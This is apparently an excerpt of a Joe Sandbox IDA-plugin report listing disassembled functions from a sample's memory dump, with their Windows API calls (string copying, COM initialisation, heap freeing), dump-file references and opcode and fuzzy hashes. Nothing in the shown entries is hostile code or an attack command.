                                                                Function 0043CDBB Relevance: 1.5, Strings: 1, Instructions: 219COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                • ength;for(i=0;i<length;i+=1){partial[i]=str(i,value)||'null'}v=partial.length===0?'[]':gap?'[\n'+gap+partial.join(',\n'+gap)+'\n'+mind+']':'['+partial.join(',')+']';gap=mind;return v}if(rep&&typeof rep==='object'){length=rep.length;for(i=0;i<length;i+=1){k=rep, xrefs: 0043CFDE
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: ength;for(i=0;i<length;i+=1){partial[i]=str(i,value)||'null'}v=partial.length===0?'[]':gap?'[\n'+gap+partial.join(',\n'+gap)+'\n'+mind+']':'['+partial.join(',')+']';gap=mind;return v}if(rep&&typeof rep==='object'){length=rep.length;for(i=0;i<length;i+=1){k=rep
                                                                • API String ID: 0-2531037153
                                                                • Opcode ID: b0de30a15207844d859e1ceb90459aaf6dc06da6405ad641bf762fe2b64ab593
                                                                • Instruction ID: 6cae724635f7145c45885da40daf68c879d049818040e2fcf152d287ebf81c82
                                                                • Opcode Fuzzy Hash: b0de30a15207844d859e1ceb90459aaf6dc06da6405ad641bf762fe2b64ab593
                                                                • Instruction Fuzzy Hash: 5A9157B56042018FD709CF10C491BA6B7E5FF88700F0492BEE95A8F792EB35E949CB55
                                                                Function 004B80D8 Relevance: 1.4, APIs: 1, Instructions: 175COMMON
                                                                Download Yara Rule
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID:
                                                                • API String ID:
                                                                • Opcode ID: b335855e582eefdf3b03c921aa6409c3a641d80dbaebd6dd11bd3c5d438a65b0
                                                                • Instruction ID: f5d4e02f9df5eb4f230b3ebe8f1113bdb286bd4f819b904bc1285eecc9b3e02d
                                                                • Opcode Fuzzy Hash: b335855e582eefdf3b03c921aa6409c3a641d80dbaebd6dd11bd3c5d438a65b0
                                                                • Instruction Fuzzy Hash: C2612B70D00218EFEF10AFA5CC46BEEBAB5FF04704F10446EE5107A291DBBA4A51DB69
                                                                Function 0043C91D Relevance: 1.4, APIs: 1, Instructions: 145stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrcpyn.KERNEL32(00000000,00000000,00000000,?,?,?,?,00000000,00000000), ref: 0043C98E
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcpyn
                                                                • String ID:
                                                                • API String ID: 97706510-0
                                                                • Opcode ID: 332989b5c435f07f114a04b5b340b311979664fa9df371264e5e416ccea5a32d
                                                                • Instruction ID: 47a58690e0fcb02ea880f7e2753d24f3eda477bf3591826c8d5e417368851795
                                                                • Opcode Fuzzy Hash: 332989b5c435f07f114a04b5b340b311979664fa9df371264e5e416ccea5a32d
                                                                • Instruction Fuzzy Hash: 2C41F8B1B41208AFFB20EE6598C2BAB77A9DB09754F14502BE908F7381D2789E00875D
                                                                Function 0047CB06 Relevance: 1.3, APIs: 1, Instructions: 86COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 0047CBE6
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Initialize
                                                                • String ID:
                                                                • API String ID: 2538663250-0
                                                                • Opcode ID: 5474b4ad2ffce09a8999664307e047282dd966176c3043abae31c421fe621b36
                                                                • Instruction ID: 65ec91e8b14186a3305ae80dc9562464187b104dee5f4be0b25a81da4547e9e5
                                                                • Opcode Fuzzy Hash: 5474b4ad2ffce09a8999664307e047282dd966176c3043abae31c421fe621b36
                                                                • Instruction Fuzzy Hash: 253101B0900608AFEB619F55D84A7DD7AF0AB05308F10C46AD50CAE281D7B94658CF5A
                                                                Function 004BCA82 Relevance: 1.3, APIs: 1, Instructions: 64stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(00000000,00000000,?,?), ref: 004BCAD9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrlen
                                                                • String ID:
                                                                • API String ID: 1659193697-0
                                                                • Opcode ID: 8a269aeb3bfc3bc47a1f2722f769c8d267a84884453a9e7c2def18ee8a427707
                                                                • Instruction ID: 61736526da1c90fd09479a754c920841a983b54de14e136c01cbc83fabaed216
                                                                • Opcode Fuzzy Hash: 8a269aeb3bfc3bc47a1f2722f769c8d267a84884453a9e7c2def18ee8a427707
                                                                • Instruction Fuzzy Hash: B521DB70D0420CEBEF00AF95E886BEDBF75FB08714F1080A9E5403A295D7751A74DB69
                                                                Function 0047EDCD Relevance: 1.3, Strings: 1, Instructions: 61COMMON
                                                                Download Yara Rule
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID:
                                                                • String ID: Free
                                                                • API String ID: 0-3978063606
                                                                • Opcode ID: 84295015bba23df668d59298cb910224709afb03a39f1800e024b48c5c143c93
                                                                • Instruction ID: 837fbae81b1606cebb644f16e7a655ec171e0761fc66a41d1d4b01894da66afa
                                                                • Opcode Fuzzy Hash: 84295015bba23df668d59298cb910224709afb03a39f1800e024b48c5c143c93
                                                                • Instruction Fuzzy Hash: 3611E7B2505255CBD720CF0AD8806EEF3E5FB68365F298D5FE86987740E3359984C780
                                                                Function 004B63E5 Relevance: 1.3, APIs: 1, Instructions: 57stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrlenW.KERNEL32(00000000,00000000,00000020,?,?,?,?,?,?,004B59E0,00000000), ref: 004B6429
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrlen
                                                                • String ID:
                                                                • API String ID: 1659193697-0
                                                                • Opcode ID: a8ffbbd6650ca10720eb381ecf9a27704d945df97594b2e49e96ad7a0fddb472
                                                                • Instruction ID: 3517c4c70b630eb3c7d79c476c8a3e7fe73188df3eb3a49897989b70a454daba
                                                                • Opcode Fuzzy Hash: a8ffbbd6650ca10720eb381ecf9a27704d945df97594b2e49e96ad7a0fddb472
                                                                • Instruction Fuzzy Hash: 62115170D0460CEBDB00AF91ED46BEDBA34EB49710F61406AE54036195DB7A0E70D76E
                                                                Function 004AE511 Relevance: 1.3, APIs: 1, Instructions: 33stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrcpyn.KERNEL32(00000001,00000001,00000000,00000000,00000000), ref: 004AE53C
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcpyn
                                                                • String ID:
                                                                • API String ID: 97706510-0
                                                                • Opcode ID: aa5f0aaad0bf64ddd8a0702eadeeb35a0b46fc62cad0e7844d9c57300ae78c13
                                                                • Instruction ID: 1cbfb2eb87bac91b13e74b3c3a3056b9d54a6a09be11a9ec1645322ef756946d
                                                                • Opcode Fuzzy Hash: aa5f0aaad0bf64ddd8a0702eadeeb35a0b46fc62cad0e7844d9c57300ae78c13
                                                                • Instruction Fuzzy Hash: 45F0A075E40304B7DB50DE92EC82F6A77789B27751F084016FD04AB381E635ED109AAA
                                                                Function 0045A1D8 Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrcpyn.KERNEL32(0045A166,0045A166,00000030,0045A166,00000000,?,?,?,00459752,00000000), ref: 0045A1F3
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcpyn
                                                                • String ID:
                                                                • API String ID: 97706510-0
                                                                • Opcode ID: 872f5e39721782cbd74c42303f2df29a26938c874a440ccd741c261298ad9ef1
                                                                • Instruction ID: 70c486093c2e9d0a7cbd5d1833d4bd34eabfbce023f9ef93658ebaf81027bca1
                                                                • Opcode Fuzzy Hash: 872f5e39721782cbd74c42303f2df29a26938c874a440ccd741c261298ad9ef1
                                                                • Instruction Fuzzy Hash: AFE0D839A44308BBCB009E80D847B6C7B34A70A711F404056FE042F292D1724A34EBDB
                                                                Function 00404964 Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrcat.KERNEL32(00000000,00000000), ref: 00404981
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcat
                                                                • String ID:
                                                                • API String ID: 4038537762-0
                                                                • Opcode ID: 8b947158b192fe5854b1fa1d4c040b9a9fb9b6c72f7c72dd15978268b6003991
                                                                • Instruction ID: c41c8baeb4ea876361e11e557d917890fabf5e8e00671f7474ff7f71d5c67e80
                                                                • Opcode Fuzzy Hash: 8b947158b192fe5854b1fa1d4c040b9a9fb9b6c72f7c72dd15978268b6003991
                                                                • Instruction Fuzzy Hash: 2FE092B5D00308ABC7009F94D843BAEB774974A300F0041B2A6047B281D5355A209BDA
                                                                Function 00442466 Relevance: 1.3, APIs: 1, Instructions: 25stringCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • lstrcpyn.KERNEL32(004423D0,004423D0,00000000,004423D0,00000000), ref: 00442481
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: lstrcpyn
                                                                • String ID:
                                                                • API String ID: 97706510-0
                                                                • Opcode ID: 7830b7b3ebbac3acbb06befd74d52960ebbfd2fe8c87051490250ad848741e2e
                                                                • Instruction ID: 796a54245656a27babe9845ed4a2a9c322952dc4e039c3cedec698f99c547848
                                                                • Opcode Fuzzy Hash: 7830b7b3ebbac3acbb06befd74d52960ebbfd2fe8c87051490250ad848741e2e
                                                                • Instruction Fuzzy Hash: 6FE04835A44308BBDB109E40D986F6D7B34EB0A711F408055FA042F196D5725964EB9A
                                                                Function 004B4CE2 Relevance: 1.3, APIs: 1, Instructions: 22memoryCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 004B4CF9
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: FreeHeap
                                                                • String ID:
                                                                • API String ID: 3298025750-0
                                                                • Opcode ID: be10bfee1e8267c3de1a2ab46995ff55cbdf872b5fe851270893657475d5634d
                                                                • Instruction ID: 2183c9ccd652546eb472068468181bd5908e1d4fccadc1821f0bb7e659a98c20
                                                                • Opcode Fuzzy Hash: be10bfee1e8267c3de1a2ab46995ff55cbdf872b5fe851270893657475d5634d
                                                                • Instruction Fuzzy Hash: BCE0C270D40208F7CB20AE40AC07F6DBB34A702710F109025FA043A1C1E6725A34AB9E
                                                                Function 004128D5 Relevance: 1.3, APIs: 1, Instructions: 21COMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • CoInitialize.OLE32(00000000), ref: 004128E8
                                                                Memory Dump Source
                                                                • Source File: 00000000.00000002.2952325747.0000000000401000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                • Associated: 00000000.00000002.2952305995.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000004EE000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000658000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.000000000065B000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.0000000000694000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A5000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006A8000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006B9000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952325747.00000000006BC000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952659183.00000000006BE000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                • Associated: 00000000.00000002.2952679286.00000000006C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_0_2_400000_1734098836319.jbxd
                                                                Yara matches
                                                                Similarity
                                                                • API ID: Initialize
                                                                • String ID:
                                                                • API String ID: 2538663250-0
